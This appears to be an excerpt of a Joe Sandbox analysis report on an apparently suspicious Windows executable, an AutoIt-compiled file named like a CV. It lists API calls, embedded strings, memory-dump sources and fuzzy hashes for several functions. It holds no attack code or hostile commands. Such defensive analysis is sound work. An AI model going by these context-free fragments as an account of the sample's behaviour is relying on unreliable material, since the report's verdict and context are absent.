                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000FD09A
                                                                                            • _wcscmp.LIBCMT ref: 000FD0D6
                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 000FD10D
                                                                                            • GetDlgCtrlID.USER32(?), ref: 000FD15F
                                                                                            • GetWindowRect.USER32(?,?), ref: 000FD195
                                                                                            • GetParent.USER32(?), ref: 000FD1B3
                                                                                            • ScreenToClient.USER32(00000000), ref: 000FD1BA
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 000FD234
                                                                                            • _wcscmp.LIBCMT ref: 000FD248
                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 000FD26E
                                                                                            • _wcscmp.LIBCMT ref: 000FD282
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                            • String ID: %s%u
                                                                                            • API String ID: 3119225716-679674701
                                                                                            • Opcode ID: 90887e9bb876cc671a78734cc7d088719b2852ea0e0b3c47aa4df827a5514094
                                                                                            • Instruction ID: 0748dea940cb77892b1a261d7963e4e0854d629084f2647e4b06c9556674ece6
                                                                                            • Opcode Fuzzy Hash: 90887e9bb876cc671a78734cc7d088719b2852ea0e0b3c47aa4df827a5514094
                                                                                            • Instruction Fuzzy Hash: 13A1CE7120420AAFDB54DF60C884FFAB7E9FF54314F00862AFA9992590DB30EA45DBD1
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 000FD8EB
                                                                                            • _wcscmp.LIBCMT ref: 000FD8FC
                                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 000FD924
                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 000FD941
                                                                                            • _wcscmp.LIBCMT ref: 000FD95F
                                                                                            • _wcsstr.LIBCMT ref: 000FD970
                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 000FD9A8
                                                                                            • _wcscmp.LIBCMT ref: 000FD9B8
                                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 000FD9DF
                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 000FDA28
                                                                                            • _wcscmp.LIBCMT ref: 000FDA38
                                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 000FDA60
                                                                                            • GetWindowRect.USER32(00000004,?), ref: 000FDAC9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                            • String ID: @$ThumbnailClass
                                                                                            • API String ID: 1788623398-1539354611
                                                                                            • Opcode ID: b39d0948e0dbb21779da2fbe4e32e621d3a9bd6d89fc3713976f43cb9ad79a31
                                                                                            • Instruction ID: 3aca09d2c8520eaf0dd27274ece9e202d88c4e28f692edfd0caaa3014eebcf8b
                                                                                            • Opcode Fuzzy Hash: b39d0948e0dbb21779da2fbe4e32e621d3a9bd6d89fc3713976f43cb9ad79a31
                                                                                            • Instruction Fuzzy Hash: 4581CC310083499BDB01DF50C885FBA7BE9EF84314F04846BFE899A496DB70DD46DBA2
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wcsnicmp
                                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                            • API String ID: 1038674560-1810252412
                                                                                            • Opcode ID: aea0dc041149c13915909e5542973d5c82b40f950bf2fd9762ef3b210ebe7574
                                                                                            • Instruction ID: a0ed00322d008f8428447df7dd81ed98253b34fb2e28dcbdfa43731a35f62149
                                                                                            • Opcode Fuzzy Hash: aea0dc041149c13915909e5542973d5c82b40f950bf2fd9762ef3b210ebe7574
                                                                                            • Instruction Fuzzy Hash: 5431AE31A48209AADB25FB50CE43FED73B69F20740F20012AF545764D2FF62AE46A612
                                                                                            APIs
                                                                                            • LoadIconW.USER32(00000063), ref: 000FEAB0
                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000FEAC2
                                                                                            • SetWindowTextW.USER32(?,?), ref: 000FEAD9
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 000FEAEE
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 000FEAF4
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 000FEB04
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 000FEB0A
                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000FEB2B
                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000FEB45
                                                                                            • GetWindowRect.USER32(?,?), ref: 000FEB4E
                                                                                            • SetWindowTextW.USER32(?,?), ref: 000FEBB9
                                                                                            • GetDesktopWindow.USER32 ref: 000FEBBF
                                                                                            • GetWindowRect.USER32(00000000), ref: 000FEBC6
                                                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 000FEC12
                                                                                            • GetClientRect.USER32(?,?), ref: 000FEC1F
                                                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 000FEC44
                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000FEC6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                            • String ID:
                                                                                            • API String ID: 3869813825-0
                                                                                            • Opcode ID: 211274a068a760bfcb7e39cf5e1873eaab1480fd3abea7e2ade32924ce4d3c78
                                                                                            • Instruction ID: 85814eb79b82e3ca1489541eef80853b9fbbe5723435fb62ec79dc1b0bdebd72
                                                                                            • Opcode Fuzzy Hash: 211274a068a760bfcb7e39cf5e1873eaab1480fd3abea7e2ade32924ce4d3c78
                                                                                            • Instruction Fuzzy Hash: 10517974900709AFDB21DFA8DD89A6FBBF5FF04704F004928E686A29B0D774A945DB00
                                                                                            APIs
                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 001179C6
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 001179D1
                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 001179DC
                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 001179E7
                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 001179F2
                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 001179FD
                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00117A08
                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00117A13
                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00117A1E
                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00117A29
                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00117A34
                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00117A3F
                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00117A4A
                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00117A55
                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00117A60
                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00117A6B
                                                                                            • GetCursorInfo.USER32(?), ref: 00117A7B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$Load$Info
                                                                                            • String ID:
                                                                                            • API String ID: 2577412497-0
                                                                                            • Opcode ID: e5d60b42b331514281a71e4b0c9df2a6a953b892d2a262807e935bb58c810f2e
                                                                                            • Instruction ID: 99b98a0718221b2eb366e4ba9136154e40c3484ed62acc37c53949dfd45a35a9
                                                                                            • Opcode Fuzzy Hash: e5d60b42b331514281a71e4b0c9df2a6a953b892d2a262807e935bb58c810f2e
                                                                                            • Instruction Fuzzy Hash: 683116B0D483196ADB109FB69C8999FBEF8FF04750F544536A50DE7280DB78A5408FA1
                                                                                            APIs
                                                                                              • Part of subcall function 000DE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000CC8B7,?,00002000,?,?,00000000,?,000C419E,?,?,?,0015DC00), ref: 000DE984
                                                                                              • Part of subcall function 000C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C53B1,?,?,000C61FF,?,00000000,00000001,00000000), ref: 000C662F
                                                                                            • __wsplitpath.LIBCMT ref: 000CC93E
                                                                                              • Part of subcall function 000E1DFC: __wsplitpath_helper.LIBCMT ref: 000E1E3C
                                                                                            • _wcscpy.LIBCMT ref: 000CC953
                                                                                            • _wcscat.LIBCMT ref: 000CC968
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 000CC978
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000CCABE
                                                                                              • Part of subcall function 000CB337: _wcscpy.LIBCMT ref: 000CB36F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                            • API String ID: 2258743419-1018226102
                                                                                            • Opcode ID: 9621450a12d76e97c5cf071ae5e7b2d2f16fa7398a235a6f1f2873f06203643a
                                                                                            • Instruction ID: 747ee761950f231d482452116b9826af7145c986c427ab66b5dca03c224b3a38
                                                                                            • Opcode Fuzzy Hash: 9621450a12d76e97c5cf071ae5e7b2d2f16fa7398a235a6f1f2873f06203643a
                                                                                            • Instruction Fuzzy Hash: A512AC715083419FD724EF64C891EAFBBE4BF98304F44491EF49A932A2DB30DA49CB52
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 0012CEFB
                                                                                            • DestroyWindow.USER32(?,?), ref: 0012CF73
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0012CFF4
                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0012D016
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0012D025
                                                                                            • DestroyWindow.USER32(?), ref: 0012D042
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000C0000,00000000), ref: 0012D075
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0012D094
                                                                                            • GetDesktopWindow.USER32 ref: 0012D0A9
                                                                                            • GetWindowRect.USER32(00000000), ref: 0012D0B0
                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0012D0C2
                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0012D0DA
                                                                                              • Part of subcall function 000DB526: GetWindowLongW.USER32(?,000000EB), ref: 000DB537
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                            • String ID: 0$tooltips_class32
                                                                                            • API String ID: 3877571568-3619404913
                                                                                            • Opcode ID: 55da0d1192e9c87de1e583007eb016bc9f9202f336594fd57ec0615aa58d9cfa
                                                                                            • Instruction ID: 70940fceb9efa14548877c1132c331112c36ac794af573c84dda55ba76c98d70
                                                                                            • Opcode Fuzzy Hash: 55da0d1192e9c87de1e583007eb016bc9f9202f336594fd57ec0615aa58d9cfa
                                                                                            • Instruction Fuzzy Hash: EB71F275140305AFDB24CF28EC84FAA37E9EB89704F14451DF985872A1E770ED92CB16
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0012F37A
                                                                                              • Part of subcall function 0012D7DE: ClientToScreen.USER32(?,?), ref: 0012D807
                                                                                              • Part of subcall function 0012D7DE: GetWindowRect.USER32(?,?), ref: 0012D87D
                                                                                              • Part of subcall function 0012D7DE: PtInRect.USER32(?,?,0012ED5A), ref: 0012D88D
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0012F3E3
                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0012F3EE
                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0012F411
                                                                                            • _wcscat.LIBCMT ref: 0012F441
                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0012F458
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0012F471
                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0012F488
                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0012F4AA
                                                                                            • DragFinish.SHELL32(?), ref: 0012F4B1
                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0012F59C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                            • API String ID: 169749273-3440237614
                                                                                            • Opcode ID: 79ab8715d166c3366534af1e18b81de788362efd6a0814600ba7160268ab8c6f
                                                                                            • Instruction ID: 42576446d0572a1ba8a2da224be1478bfc135f11b676d82eb339071d068b3884
                                                                                            • Opcode Fuzzy Hash: 79ab8715d166c3366534af1e18b81de788362efd6a0814600ba7160268ab8c6f
                                                                                            • Instruction Fuzzy Hash: B2616B76108300AFC701EF60DC45E9FBBF8EF89710F144A2EF595921A2DB709A59CB52
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0010AB3D
                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0010AB46
                                                                                            • VariantClear.OLEAUT32(?), ref: 0010AB52
                                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0010AC40
                                                                                            • __swprintf.LIBCMT ref: 0010AC70
                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0010AC9C
                                                                                            • VariantInit.OLEAUT32(?), ref: 0010AD4D
                                                                                            • SysFreeString.OLEAUT32(00000016), ref: 0010ADDF
                                                                                            • VariantClear.OLEAUT32(?), ref: 0010AE35
                                                                                            • VariantClear.OLEAUT32(?), ref: 0010AE44
                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0010AE80
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                            • API String ID: 3730832054-3931177956
                                                                                            • Opcode ID: 0757482565a2d87c5e64f13a46273c84d381504b3fe55f3174a664429842b65e
                                                                                            • Instruction ID: 3cc9fc01bfcb6ef491603331eeeb2f566f2449a8c3c4c7dc463b64c8904206a5
                                                                                            • Opcode Fuzzy Hash: 0757482565a2d87c5e64f13a46273c84d381504b3fe55f3174a664429842b65e
                                                                                            • Instruction Fuzzy Hash: 45D1E071600306DBDB249F65D884BAEB7B5BF09700F558056F4859F2D2DBB4EC80DBA2
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 001271FC
                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00127247
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                            • API String ID: 3974292440-4258414348
                                                                                            • Opcode ID: c1e72d6c95f524b6b0159b74e355bac881fd2cbb54f5e671210cabcdb2ac8c23
                                                                                            • Instruction ID: 6d58dca52981f8213144ded16ef2b8aab174502b990ecd79082ec37ed08141eb
                                                                                            • Opcode Fuzzy Hash: c1e72d6c95f524b6b0159b74e355bac881fd2cbb54f5e671210cabcdb2ac8c23
                                                                                            • Instruction Fuzzy Hash: FC916C342083519BCB04EF10D951AAEB7A1BF94310F00485DF9966B3E3DB30ED1ADB95
                                                                                            APIs
                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0012E5AB
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0012BEAF), ref: 0012E607
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0012E647
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0012E68C
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0012E6C3
                                                                                            • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0012BEAF), ref: 0012E6CF
                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0012E6DF
                                                                                            • DestroyIcon.USER32(?,?,?,?,?,0012BEAF), ref: 0012E6EE
                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0012E70B
                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0012E717
                                                                                              • Part of subcall function 000E0FA7: __wcsicmp_l.LIBCMT ref: 000E1030
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                            • String ID: .dll$.exe$.icl
                                                                                            • API String ID: 1212759294-1154884017
                                                                                            • Opcode ID: b7ed8840572fc3e991df893763932c3f7d45274c0328c3258f7a862a793f38c7
                                                                                            • Instruction ID: ff5e97403efad2a57f84c61f2591fdf79ee97d7ba390ddeb473fd2a232d26bec
                                                                                            • Opcode Fuzzy Hash: b7ed8840572fc3e991df893763932c3f7d45274c0328c3258f7a862a793f38c7
                                                                                            • Instruction Fuzzy Hash: E161CF71500225BEEB24DF64EC46FFE7BB8BB18714F104115F915E61D1EBB099A0CBA0
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • CharLowerBuffW.USER32(?,?), ref: 0010D292
                                                                                            • GetDriveTypeW.KERNEL32 ref: 0010D2DF
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0010D327
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0010D35E
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0010D38C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                            • API String ID: 1148790751-4113822522
                                                                                            • Opcode ID: e5c9a76d9caebf68b6f84b38d34a95db916db1c2e9b8025c06bcb51ebc3bddf7
                                                                                            • Instruction ID: 241e296038422a6ae5ef75b6a4c916a41bb42b6f2f334e015f9dccdbdf990fea
                                                                                            • Opcode Fuzzy Hash: e5c9a76d9caebf68b6f84b38d34a95db916db1c2e9b8025c06bcb51ebc3bddf7
                                                                                            • Instruction Fuzzy Hash: BE5118755043059FC700EF10D981EAEB7E4FF98758F04885DF89AA72A2DB71AE06CB52
